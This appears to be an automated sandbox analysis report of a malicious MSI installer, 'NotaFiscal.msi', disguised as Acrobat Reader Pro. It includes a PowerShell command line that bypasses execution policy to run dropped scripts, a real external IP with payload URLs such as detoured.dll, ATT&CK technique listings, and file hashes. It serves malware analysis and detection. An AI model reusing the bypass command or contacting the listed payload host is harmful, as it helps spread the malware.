            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7416Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4488Thread sleep count: 7416 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4872Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5144Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI80D4.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI8075.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7FD8.tmpJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: powershell.exe, 00000003.00000003.377112565.0000000005D56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.388596354.000000000583A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
            Source: powershell.exe, 00000003.00000003.377112565.0000000005D56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.388596354.000000000555A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.388596354.000000000583A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Yara matchFile source: NotaFiscal.msi, type: SAMPLE
            Source: Yara matchFile source: amsi32_5896.amsi.csv, type: OTHER
            Source: Yara matchFile source: C:\Windows\Installer\6e7bc0.msi, type: DROPPED
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss846F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi846B.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr846C.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr846D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss846f.ps1" -propfile "c:\users\user\appdata\local\temp\msi846b.txt" -scriptfile "c:\users\user\appdata\local\temp\scr846c.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr846d.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss846f.ps1" -propfile "c:\users\user\appdata\local\temp\msi846b.txt" -scriptfile "c:\users\user\appdata\local\temp\scr846c.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr846d.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss846F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi846B.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr846C.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr846D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            1
            Replication Through Removable Media
            1
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            11
            Process Injection
            22
            Masquerading
            OS Credential Dumping1
            Security Software Discovery
            1
            Replication Through Removable Media
            1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts1
            PowerShell
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            21
            Virtualization/Sandbox Evasion
            LSASS Memory1
            Process Discovery
            Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
            Process Injection
            Security Account Manager21
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Obfuscated Files or Information
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets11
            Peripheral Device Discovery
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            File Deletion
            Cached Domain Credentials12
            System Information Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 803452 Sample: NotaFiscal.msi Startdate: 10/02/2023 Architecture: WINDOWS Score: 68 36 Multi AV Scanner detection for submitted file 2->36 38 Yara detected Powershell download and execute 2->38 40 Yara detected MalDoc 2->40 8 msiexec.exe 14 34 2->8         started        11 msiexec.exe 4 2->11         started        process3 file4 22 C:\Windows\Installer\6e7bc0.msi, Composite 8->22 dropped 24 C:\Windows\Installer\MSI822E.tmp, PE32 8->24 dropped 26 C:\Windows\Installer\MSI80D4.tmp, PE32 8->26 dropped 28 3 other files (none is malicious) 8->28 dropped 13 msiexec.exe 9 8->13         started        process5 file6 30 C:\Users\user\AppData\Local\...\scr846C.ps1, Unicode 13->30 dropped 32 C:\Users\user\AppData\Local\...\pss846F.ps1, Unicode 13->32 dropped 42 Bypasses PowerShell execution policy 13->42 17 powershell.exe 15 19 13->17         started        signatures7 process8 dnsIp9 34 20.125.141.224, 49702, 80 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 17->34 20 conhost.exe 17->20         started        process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            NotaFiscal.msi16%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://20.125.141.224/pro/0%Avira URL Cloudsafe
            http://20.125.141.224/pro/$ProcName20%Avira URL Cloudsafe
            http://20.125.141.224/pro/detoured.dllx0%Avira URL Cloudsafe
            http://20.125.141.224/pro/detoured.dll6C.ps10%Avira URL Cloudsafe
            http://20.125.141.224/pro/$ProcName0%Avira URL Cloudsafe
            http://20.125.141.22440%Avira URL Cloudsafe
            http://20.125.141.2240%Avira URL Cloudsafe
            http://20.125.140%Avira URL Cloudsafe
            http://20.125.141.224/pro/$ProcN0%Avira URL Cloudsafe
            No contacted domains info
            NameSourceMaliciousAntivirus DetectionReputation
            http://20.125.141.224/pro/detoured.dll6C.ps1powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://20.125.141.224/pro/$ProcName2powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmp, NotaFiscal.msi, scr846C.ps1.2.dr, 6e7bc0.msi.1.drfalse
              • Avira URL Cloud: safe
              unknown
              http://20.125.141.224/pro/detoured.dllxpowershell.exe, 00000003.00000002.388596354.00000000056D0000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.388596354.000000000555A000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.thawte.com/cps0/NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drfalse
                high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.388596354.000000000555A000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://go.micropowershell.exe, 00000003.00000003.369099618.0000000005E77000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.thawte.com/repository0WNotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drfalse
                    high
                    http://20.125.141.224/pro/powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://contoso.com/powershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://contoso.com/Licensepowershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/Iconpowershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://20.125.141.224/pro/$ProcNamepowershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmp, NotaFiscal.msi, scr846C.ps1.2.dr, 6e7bc0.msi.1.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.advancedinstaller.comNotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.drfalse
                        high
                        http://20.125.141.2244powershell.exe, 00000003.00000002.388596354.0000000005764000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://20.125.141.224powershell.exe, 00000003.00000002.388596354.000000000575B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.388596354.0000000005421000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://20.125.141.224/pro/$ProcNpowershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.388596354.000000000555A000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://20.125.14powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            20.125.141.224
                            unknownUnited States
                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:803452
                            Start date and time:2023-02-10 00:59:09 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 6m 59s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:16
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample file name:NotaFiscal.msi
                            Detection:MAL
                            Classification:mal68.troj.evad.winMSI@7/30@0/1
                            EGA Information:Failed
                            HDC Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 55
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .msi
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
                            • Execution Graph export aborted for target powershell.exe, PID 5896 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            TimeTypeDescription
                            01:00:53API Interceptor27x Sleep call for process: powershell.exe modified
                            No context
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            MICROSOFT-CORP-MSN-AS-BLOCKUSfile.exeGet hashmaliciousBrowse
                            • 40.93.207.1
                            file.exeGet hashmaliciousBrowse
                            • 40.93.212.0
                            file.exeGet hashmaliciousBrowse
                            • 40.93.207.5
                            file.exeGet hashmaliciousBrowse
                            • 40.93.212.0
                            http://us.content.exclaimer.net/?url=https://doroyhpet1.com/now/new/Stepan/dclayton@stepan.comGet hashmaliciousBrowse
                            • 13.107.237.60
                            #Ud83d#Udce7#U2122 EFT Doc-7-02-2023.htmlGet hashmaliciousBrowse
                            • 13.107.237.60
                            file.exeGet hashmaliciousBrowse
                            • 40.93.207.1
                            file.exeGet hashmaliciousBrowse
                            • 40.93.207.5
                            file.exeGet hashmaliciousBrowse
                            • 40.93.212.0
                            #Ud83d#Udcd1Monthly Payable.htmGet hashmaliciousBrowse
                            • 13.107.253.60
                            file.exeGet hashmaliciousBrowse
                            • 40.93.212.0
                            http://us.content.exclaimer.net/?url=https://isisindigo.com/auth/new/Draper/jrooney@draper.comGet hashmaliciousBrowse
                            • 13.107.237.60
                            file.exeGet hashmaliciousBrowse
                            • 104.47.54.36
                            https://seligsonrothmanandrothman-my.sharepoint.com/:o:/g/personal/ilan_srrlaw_com/Em-FPe-yZmlIjix1Jz8NZE8BeEsuzCvOmDAyhcmXwLO_dw?e=5%3ard841M&at=9Get hashmaliciousBrowse
                            • 13.107.237.60
                            file.exeGet hashmaliciousBrowse
                            • 40.93.212.0
                            https://ffm.bio/5pnnqkaGet hashmaliciousBrowse
                            • 13.107.237.45
                            file.exeGet hashmaliciousBrowse
                            • 40.126.31.71
                            file.exeGet hashmaliciousBrowse
                            • 40.93.207.5
                            #Ud83d#Udcd1Monthly Payable.htmGet hashmaliciousBrowse
                            • 13.107.238.45
                            file.exeGet hashmaliciousBrowse
                            • 40.93.212.0
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            C:\Windows\Installer\MSI7E7F.tmpradarinstaller.exeGet hashmaliciousBrowse
                              radarinstaller.exeGet hashmaliciousBrowse
                                Danfe2372342.msiGet hashmaliciousBrowse
                                  Danfe2372342.msiGet hashmaliciousBrowse
                                    id-Processo_Z5TGVQUK.msiGet hashmaliciousBrowse
                                      id-Processo_Z5TGVQUK.msiGet hashmaliciousBrowse
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):1140
                                        Entropy (8bit):5.503521595678661
                                        Encrypted:false
                                        SSDEEP:24:/Bd4DOjSt6Y4fbDdsgfBcAefPpUC+AYoeDXYDhiSWILshW+AZ:/r4DO+sY4j7XeZJbwYD8SJLAWbZ
                                        MD5:C0E9D26AF1810421F3644898CDCEB43A
                                        SHA1:921BD1D92F664558BB9F2E140E276A1814D1A57C
                                        SHA-256:D370C79F8636DFAFC58A540A6B6828CAA11A3B8A1CD28BD18272EB344E9EE6BB
                                        SHA-512:90011537D4630BAC40B4292FD635231992FAC9B3821440A67501696DF11D9998E889A8758A901FA465FC3EF5018A784C65D3C9EE4CFBF022B4A9C469FEDD07F8
                                        Malicious:false
                                        Reputation:low
                                        Preview:...@IXOS.@.....@+.JV.@.....@.....@.....@.....@.....@......&.{8150EFD5-A4CB-41EF-AEB7-15BC9E7F8D67}..Acrobat Reader Pro..NotaFiscal.msi.@.....@...u.@.....@........&.{819D06D6-E0AA-46C4-91C3-F6F4E17BC272}.....@.....@.....@.....@.......@.....@.....@.......@......Acrobat Reader Pro......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{FC03EAC5-BA1F-49E5-8B24-3726A9E0E236}&.{8150EFD5-A4CB-41EF-AEB7-15BC9E7F8D67}.@......&.{36C855C3-CBFC-424F-AA15-7C4DDD8F3200}&.{8150EFD5-A4CB-41EF-AEB7-15BC9E7F8D67}.@......&.{F097E14A-4458-4E96-8676-952F7577E3C6}&.{8150EFD5-A4CB-41EF-AEB7-15BC9E7F8D67}.@........CreateFolders..Creating folders..Folder: [1]#.3.C:\Program Files (x86)\2125.651\Acrobat Reader Pro\.@....#.,.C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.D.e.s.k.t.o.p.\.M.o.d.u.l.o. .d.e. .S.e.g.u.r.a.n...a.\..@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@....$.Software\2
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):8003
                                        Entropy (8bit):4.839308921501875
                                        Encrypted:false
                                        SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
                                        MD5:937C6E940577634844311E349BD4614D
                                        SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
                                        SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
                                        SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
                                        Malicious:false
                                        Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
